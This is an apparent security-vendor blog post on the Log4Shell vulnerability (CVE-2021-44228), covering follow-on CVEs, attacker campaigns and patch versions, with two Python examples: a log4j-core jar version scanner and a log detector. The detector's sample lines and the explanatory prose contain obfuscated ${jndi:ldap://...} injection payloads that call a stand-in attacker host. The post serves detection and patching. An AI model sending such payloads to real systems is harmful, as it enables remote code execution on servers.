{"id":7241,"date":"2022-08-30T07:47:45","date_gmt":"2022-08-30T14:47:45","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=7241"},"modified":"2023-05-02T15:15:00","modified_gmt":"2023-05-02T22:15:00","slug":"have-you-patched-the-apache-log4j-vulnerability-cve-2021-44228-2","status":"publish","type":"post","link":"https:\/\/webdev.securin.xyz\/articles\/have-you-patched-the-apache-log4j-vulnerability-cve-2021-44228-2\/","title":{"rendered":"Have you Patched the Apache Log4j vulnerability CVE-2021-44228?"},"content":{"rendered":"\t\t
Apache Log4j vulnerability CVE-2021-44228 (Log4Shell) is a critical, unauthenticated remote code execution vulnerability in Log4j 2 with a CVSS base score of 10.0. On December 9, 2021, a working exploit was posted publicly for Apache Log4j, a widely used logging library for Java, and scanning and exploitation attempts followed almost immediately.<\/p>
The implications of Log4j are going to have a very long tail! Leaders need to continue to verify which of their systems are impacted and continuously check for updates to make sure they are completely patched. Continuous scanning has been the most effective method that we’ve seen success with.<\/p>
-Aaron Sandeen, CEO of Securin<\/p><\/blockquote>
How did this incident unfold?<\/strong><\/a>\u00a0|\u00a0Timeline<\/strong><\/a> | <\/strong>Securin’s POC Exploit<\/a>\u00a0 |\u00a0Get our Detection Script<\/a> | IOCs<\/a> | Our Analysis<\/a> | Vulnerable Products<\/a><\/strong><\/p>
Recent Developments<\/h2>
APT MuddyWater Association: <\/strong>Iranian APT group MuddyWater joins the Log4j bandwagon, continuing the long-tail impact of the vulnerability that first made waves in December 2021.<\/p>
APT Lazarus Association:<\/strong> On May 23, 2022, Lazarus, a group attributed to North Korea, was reported exploiting the Log4j RCE vulnerability (CVE-2021-44228) to gain access to VMware Horizon servers. In the attack chain, a PowerShell command is launched from VMware Horizon’s ws_tomcatservice.exe process, the Tomcat service that loads the vulnerable Log4j library, and that command installs the NukeSped backdoor on the server. Administrators should apply VMware’s Horizon fixes for the Log4j vulnerabilities (these are software updates, not firmware) and confirm that the bundled Log4j has been replaced or mitigated.<\/p>
Fire Chili Malware:<\/strong> On April 1, 2022, researchers reported that the Chinese group Deep Panda was deploying a new rootkit named Fire Chili on VMware Horizon servers compromised through Log4Shell. They noted several overlaps between the Deep Panda campaign and Winnti, another well-known Chinese group, including the use of stolen digital certificates to sign malware.\u00a0 Earlier, on February 18, 2022, the Iran-linked group TunnelVision was observed exploiting the Log4j vulnerability to deliver ransomware to unpatched VMware Horizon servers.<\/p>
Ubiquiti Network Targeted: <\/strong>On February 4, 2022, Ubiquiti network appliances running the UniFi application were reported to be compromised and taken over by threat actors using a customized public exploit for the Log4Shell vulnerability.<\/p>
Night Sky Ransomware: <\/strong>The Night Sky ransomware gang began exploiting CVE-2021-44228 in the Log4j logging library to gain access to VMware Horizon servers. Night Sky targets corporate networks, has encrypted the data of multiple victims, and demanded $800,000 in ransom from one of them.<\/p>
On January 10, 2022, Microsoft warned of a new campaign by a China-based actor tracked as DEV-0401 that exploits Log4Shell on internet-facing VMware Horizon servers to deploy the Night Sky ransomware.<\/p>
US Federal Trade Commission Warning:<\/strong> On January 5, 2022, the US Federal Trade Commission warned<\/a> that it will take action against any US company that fails to protect its customers’ information from ongoing Log4j attacks. Firms, and the vendors whose products use Log4j, need to act quickly to reduce the risk of consumer harm and avoid FTC legal action.<\/p>
After observing state-sponsored and criminal actors probing systems for the Log4Shell weakness in December, Microsoft issued<\/a> a warning to Windows and Azure customers to remain vigilant.<\/p>
ONUS Falls Victim: <\/strong>ONUS, a crypto trading platform, suffered a cyberattack on its payment system, which was running a vulnerable Log4j version. After the firm refused to pay a $5 million ransom, the threat actors put the data of roughly 2 million ONUS customers up for sale on dark web forums.\u00a0 According to researchers, ONUS’s Cyclos server was exploited between December 11 and 13, and backdoors were planted for sustained access. We recommend that users upgrade to the newest Log4j release, which at the time of writing is 2.17.1.<\/p>
According to CrowdStrike researchers, a Chinese hacker group known as AQUATIC PANDA famous for industrial espionage and intelligence collection exploited a Log4j vulnerability to target a significant academic institution.<\/p>
Log4Shell Fifth Vulnerability: <\/strong>On December 29, 2021, Apache disclosed<\/a> a fifth vulnerability in Log4j 2.17.0, an RCE flaw assigned CVE-2021-44832 (CVSS 6.6, medium). It is less severe than Log4Shell because the attacker must already be able to modify the logging configuration and point a JDBC Appender at an attacker-controlled JNDI URI; a patch is available in 2.17.1 (and 2.12.4 and 2.3.2 for the older Java lines). The issue is classified under two weaknesses, CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component) and CWE-20 (Improper Input Validation).<\/p>
PoC Released: <\/strong>On December 25, 2021, Securin researchers published a Proof-of-Concept<\/a> exploit for the CVE-2021-44228 Log4j vulnerability.<\/p>
Note: <\/strong>This is not a “point and click” exploit. The initial trigger payload will be generated; however, the user will be responsible for injecting it into the appropriate location (i.e., HTTP header\/chat\/etc.).<\/p>
CISA, NSA & FBI: <\/strong>On December 22, 2021, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), and partner cybersecurity agencies from Australia, New Zealand, and the United Kingdom issued a joint Cybersecurity Advisory (CSA) with mitigation guidance for the Log4j vulnerabilities.<\/p>
Additionally, CISA has published an open-source scanner to discover systems vulnerable to Log4Shell, comparable to the CERT Coordination Center (CERT\/CC) tool.<\/p>
Belgian Defense Ministry Targeted:<\/strong> On December 22, 2021, the Belgian defense ministry disclosed a breach of its computer networks that resulted from unpatched Log4j instances on internet-facing servers, a clear sign of poor cyber hygiene. Despite knowing about the flaw and the significant risk it poses to networks around the world, organizations continue to ignore the warnings, which eventually leads to major cyberattacks. We therefore urge users to patch every application that bundles Log4j immediately, not only the obvious Apache products.<\/p>
Log4Shell’s Fourth Vector\u00a0<\/strong><\/p>
{Updated on December 21}: Unsurprisingly, another RCE vulnerability (CVE-2021-4104) has surfaced, this time affecting Log4j 1.2 when the JMSAppender is used. It is a deserialization issue (CWE-502, Deserialization of Untrusted Data) that requires the attacker to already have write access to the Log4j configuration so that the appender points at an attacker-controlled JNDI endpoint; logging an untrusted string alone does not trigger it. It will not be fixed because the 1.x branch reached end-of-life in 2015. CVE-2021-4104 has a severity of\u00a0 8.1 (high) on the CVSS v3 scale.<\/p>
Multiple threat actors are now taking advantage of the Apache Log4j vulnerabilities to infect affected Windows devices, with the latest attacks using the Dridex banking malware or Meterpreter. Dridex infections have also been connected to ransomware attacks carried out by the Evil Corp hacking gang activity.<\/p>
On December 17, 2021, CISA issued Emergency Directive 22-02<\/a>, requiring federal civilian agencies to identify Log4j-affected systems and apply the necessary patches and mitigations by 5 p.m. EST on December 23, 2021.<\/p>
Log4Shell’s DoS Vector Patched<\/strong><\/p>
{Updated on December 18}: Apache has released 2.17.0 to fix a third Log4j 2 flaw, tracked as CVE-2021-45105: a denial of service caused by uncontrolled recursion when a self-referential lookup is evaluated, for example a Thread Context Map value containing a recursive ${ctx:...} pattern. This CVE carries a CVSS score of 7.5 (high) and affects versions 2.0-alpha1 through 2.16.0 (2.12.3 excluded). We urge users to move to 2.17.0, or 2.12.3 on the Java 7 line.<\/p>
Earlier, Conti ransomware affiliates were found moving laterally through vulnerable VMware vCenter servers, making Conti the first major ransomware operation known to weaponize the Log4j vulnerability.<\/p>
In addition, researchers in China observed an old, previously inactive ransomware family named TellYouThePass being used against Windows and Linux systems by exploiting the Log4j remote code execution flaw.<\/p>
The never-ending, incomplete fix pattern for the LogShell vulnerabilities continues to discover newer loopholes. We will now have to wait and watch how the latest release holds up.<\/p>
{Updated on December 17}: Praetorian researchers warned of a third independent flaw in Log4j version 2.15.0 that might allow sensitive data to be exfiltrated in certain instances. To avoid future exploitation, more technical details about the vulnerability have been concealed; however, it’s unclear whether this has already been resolved in version 2.16.0.<\/p>
The second Log4j vulnerability (CVE-2021-45046), initially rated 3.7 (low) on the CVSS v3 scale, has been raised to 9.0 (critical) after researchers showed that, in certain non-default configurations, the flaw could be used for information leaks, remote code execution, and local privilege escalation, not just denial of service. Apache has accordingly reclassified it from a denial-of-service issue to remote code execution.<\/p>
Considering Khonsari ransomware and threat groups such as Nemesis Kitten, Hafnium, and Phosphorus are looking for an opportunity to make the most of the critical vulnerability, we urge organizations to employ mitigations and patch the vulnerable systems on priority to reduce the impact of Log4j vulnerability on their systems.<\/p>
A New Ransomware: <\/strong>On December 15, 2021, a new ransomware family targeting Windows servers, dubbed Khonsari, was observed exploiting CVE-2021-44228. The most troubling aspect is the direct deployment of ransomware through the Log4Shell (CVE-2021-44228) vulnerability. Nemesis Kitten, an Iran-based state-sponsored threat actor, was also seen leveraging the vulnerability in an attack.<\/p>
Furthermore, Advanced Persistent Threat groups from China, Iran, North Korea, and Turkey, including Hafnium and Phosphorus, have stepped into the battle to operationalize the vulnerability and find and exploit as many vulnerable systems as possible.<\/p>
{December 15}:<\/strong> A second vulnerability in Apache Log4j, tracked as CVE-2021-45046, was disclosed and initially rated 3.7\/10 (low) on the CVSS scale. It arises because the fix for CVE-2021-44228 in 2.15.0 was incomplete in certain non-default configurations: when the logging configuration uses a Pattern Layout with a Context Lookup (for example $${ctx:loginId}), an attacker who controls Thread Context Map (MDC) input can craft malicious data using a JNDI Lookup pattern, resulting in a denial of service (DoS).<\/p>
CVE-2021-45046 is categorized under the weakness enumeration CWE-502 (Deserialization of Untrusted Data). Although its initial severity was low, the CWE assigned to it appears in MITRE’s 2021 Top 25 most dangerous software weaknesses.<\/a><\/p>
Apache has already released an updated version<\/a> of Log4j 2.16.0 for this issue and urges users to apply the necessary patches.<\/p>
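The sequence of fixes above (2.15.0, 2.16.0, 2.17.0 and 2.17.1, with 2.12.x and 2.3.x backports for older Java runtimes) means a host-side scan has to classify each log4j-core artifact by exact version rather than by mere presence, and has to account for the JndiLookup.class removal that Apache documented as an interim mitigation. The following Python is an added example written for this article; it is not Securin’s detection script, CISA’s scanner, or any Apache tooling. It reads the Maven pom.properties inside a log4j-core jar, parses the version, and reports which of the four Log4j 2 CVEs still apply. The jars it scans are constructed in memory with dummy class entries so the example runs offline; the fixed-version table is taken from Apache’s Log4j security page, and the treatment of every earlier 2.x release as affected is a deliberately conservative assumption.

```python
import io
import re
import zipfile

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First fixed release per CVE, keyed by Log4j 2 release line (major, minor);
# "default" is the main Java 8+ line. Values from the Apache Log4j security page.
FIXED_IN = {
    "CVE-2021-44228": {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2), "default": (2, 15, 0)},
    "CVE-2021-45046": {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2), "default": (2, 16, 0)},
    "CVE-2021-45105": {(2, 3): (2, 3, 1), (2, 12): (2, 12, 3), "default": (2, 17, 0)},
    "CVE-2021-44832": {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4), "default": (2, 17, 1)},
}
# Deleting JndiLookup.class removes only the message-lookup path; the recursion
# DoS (45105) and the JDBC appender issue (44832) are unaffected by it.
CLOSED_BY_JNDI_REMOVAL = {"CVE-2021-44228", "CVE-2021-45046"}

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", re.IGNORECASE)
PRERELEASE_RANK = {"alpha": 0, "beta": 1, "rc": 2, "final": 3}


def parse_version(text):
    """Turn '2.0-beta9' or '2.14.1' into a tuple that sorts like Log4j releases."""
    m = VERSION_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, pre, pre_num = m.groups()
    rank = PRERELEASE_RANK[pre.lower()] if pre else PRERELEASE_RANK["final"]
    return (int(major), int(minor), int(patch or 0), rank, int(pre_num or 0))


def assess_log4j_core_jar(jar_bytes):
    """Report which Log4j 2 CVEs a log4j-core jar is still exposed to."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        jndi_present = JNDI_LOOKUP_CLASS in names
        if POM_PROPERTIES not in names:
            return {"version": None, "jndi_lookup_present": jndi_present,
                    "vulnerable": [], "note": "no log4j-core pom.properties; inspect manually"}
        props = {}
        for line in jar.read(POM_PROPERTIES).decode("utf-8").splitlines():
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                props[key.strip()] = value.strip()
    version = parse_version(props["version"])
    vulnerable = []
    for cve, table in FIXED_IN.items():
        fixed = table.get(version[:2], table["default"])
        # Conservative assumption: every 2.x release before the fix is affected.
        if version[0] == 2 and version < fixed:
            if cve in CLOSED_BY_JNDI_REMOVAL and not jndi_present:
                continue  # mitigated by class removal
            vulnerable.append(cve)
    return {"version": props["version"], "jndi_lookup_present": jndi_present,
            "vulnerable": vulnerable, "note": ""}


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar (not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"#Generated by Maven\nversion={version}\n"
                                     "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def scan_samples():
    """Assess a handful of constructed jars covering the main decision branches."""
    samples = {
        "log4j-core-2.14.1.jar": build_sample_jar("2.14.1"),
        "log4j-core-2.14.1-jndi-removed.jar": build_sample_jar("2.14.1", include_jndi_lookup=False),
        "log4j-core-2.15.0.jar": build_sample_jar("2.15.0"),
        "log4j-core-2.12.2.jar": build_sample_jar("2.12.2"),
        "log4j-core-2.17.1.jar": build_sample_jar("2.17.1"),
    }
    return {name: assess_log4j_core_jar(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name}: {', '.join(result['vulnerable']) or 'no known Log4j 2 issues'}")
```

To use it on a real host, feed assess_log4j_core_jar the bytes of each jar found on disk. It deliberately does not descend into nested jars (WAR/EAR fat jars) or detect shaded copies whose pom.properties has been relocated; those are exactly where most missed instances hide, so a production scanner needs to recurse into archives and also hash class files.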
<\/a>Apache Log4J Vulnerability<\/h2>
CVE-2021-44228 is a critical zero-day vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1), the Java logging library maintained by the Apache Software Foundation. Log4j’s message lookup feature evaluates ${...} expressions found inside logged strings, including JNDI lookups, so an unauthenticated attacker who can get a string such as ${jndi:ldap://attacker-host/x} written to a log (via an HTTP header, a username, a chat message, or any other logged field) can make the server fetch and load attacker-controlled code, giving full control of the affected server.<\/p>
This zero-day vulnerability came to light on December 9, 2021, when a security researcher shared an exploit for the then-unknown bug on Twitter. A CVE identifier was assigned shortly afterwards, and the vulnerability has been exploited in the wild ever since, with many public exploits available. The exploit achieves remote code execution, enabling a complete takeover of the server.<\/p>
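To make the mechanism concrete, here is an added example that is not part of the original post and is not Securin’s detection script: a small Python detector that resolves nested Log4j lookups inside-out, the way the library’s substitution engine does, and then flags ${jndi:...} payloads in log lines. The log lines, the attacker.example callback host, and the function names are constructed for illustration; the lookup forms it understands (${lower:}, ${upper:}, and the ${key:-default} fallback) are the obfuscations seen in public scanning traffic, and the resolver is a heuristic written for this example, not a reimplementation of Log4j.

```python
import re

# Constructed sample access-log lines (not taken from any real incident). The
# three payload styles are the publicly documented ones: a plain JNDI lookup,
# nesting with ${lower:...}, and the ${::-x} default-value trick.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:03:15:11 +0000] "GET /login HTTP/1.1" 200 1043 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.7 - - [10/Dec/2021:03:16:52 +0000] "GET /api HTTP/1.1" 200 88 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/c}"',
    '10.0.0.8 - - [10/Dec/2021:03:17:03 +0000] "GET /docs HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [10/Dec/2021:03:18:40 +0000] "GET /?q=${env:USER} HTTP/1.1" 200 9 "-" '
    '"curl/7.79.1"',
]

# Innermost ${...} expression: no further "${" or "}" inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup; Log4j matches lookup prefixes case-insensitively.
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)
JNDI_TARGET = re.compile(r"\$\{jndi:([a-z]+)://([^/:}]+)", re.IGNORECASE)


def _resolve_inner(body):
    """Emulate the lookups attackers use to hide the literal string 'jndi'.

    Heuristic: a body containing ':-' is treated as ${key:-default} with an
    undefined key, which is what the ${::-j} style relies on.
    """
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    # Unknown or terminal lookup (e.g. ${jndi:...}, ${env:...}): leave as is.
    return "${" + body + "}"


def normalize_lookups(text, max_passes=16):
    """Resolve nested lookups inside-out until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve_inner(match.group(1))
            if resolved != match.group(0):
                changed = True
            return resolved

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def find_jndi_payload(line):
    """Return the de-obfuscated ${jndi:...} lookup in a line, or None."""
    match = JNDI_LOOKUP.search(normalize_lookups(line))
    return match.group(0) if match else None


def scan_log_lines(lines):
    """Flag lines carrying a JNDI lookup and extract the callback scheme and host."""
    hits = []
    for line in lines:
        payload = find_jndi_payload(line)
        if payload is None:
            continue
        target = JNDI_TARGET.match(payload)
        hits.append({
            "line": line,
            "payload": payload,
            "scheme": target.group(1).lower() if target else None,
            "host": target.group(2) if target else None,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"{hit['scheme']}://{hit['host']}  <-  {hit['payload']}")
```

Run it over exported proxy, WAF and application logs rather than web-server access logs alone, since any logged field (User-Agent, X-Forwarded-For, usernames, form data) is a sink; the host in each hit is the attacker’s callback server, which is what to block at egress and hunt for in DNS and LDAP/RMI connection logs. The last sample line shows the trade-off: a bare ${env:USER} is not a JNDI lookup and is not flagged, although on a vulnerable version it is still a probe worth alerting on.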
<\/a>Our Analysis<\/h2>
CVE-2021-44228 is a Remote Code Execution vulnerability in Apache Log4j 2, a library with over 400,000 downloads from its GitHub project.<\/p><\/li>
This CVE is classified under the weakness enumerations CWE-502, CWE-400, and CWE-20, which fall under the 2021 list of most dangerous software weaknesses<\/a> published by MITRE.<\/p><\/li>
The first alert was released by CERT New Zealand<\/a>, followed by those from CISA<\/a> and the National Cyber Security Centre of the United Kingdom<\/a>.<\/p><\/li>
According to researchers, botnets such as Mirai and Muhstik (aka Tsunami) are targeting vulnerable systems to deploy cryptocurrency miners and to plant backdoors on Linux hosts, which are then used to launch DDoS attacks.<\/p><\/li>
Popular scanners such as Qualys, Nessus, and Nexpose can detect the CVE-2021-44228 vulnerability and have assigned plugin IDs to it.<\/p><\/li><\/ul>
<\/a>Vulnerable Products {Updated on April 7, 2022}<\/h2>
This vulnerability affects everything from enterprise software to web applications and popular consumer products. In a nutshell, if an organization uses Log4j 2 directly, or through a product that bundles it (Apache Struts 2, Apache Solr, Apache Druid, Apache Flink, and many others), it is exposed to CVE-2021-44228 until that component is updated or mitigated.<\/p>
In our initial analysis of Log4j-vulnerable products we found only 273 impacted products; that number has now grown to 1888. Our Securin analysts are keeping up to date on the affected products and update the following list daily.<\/p>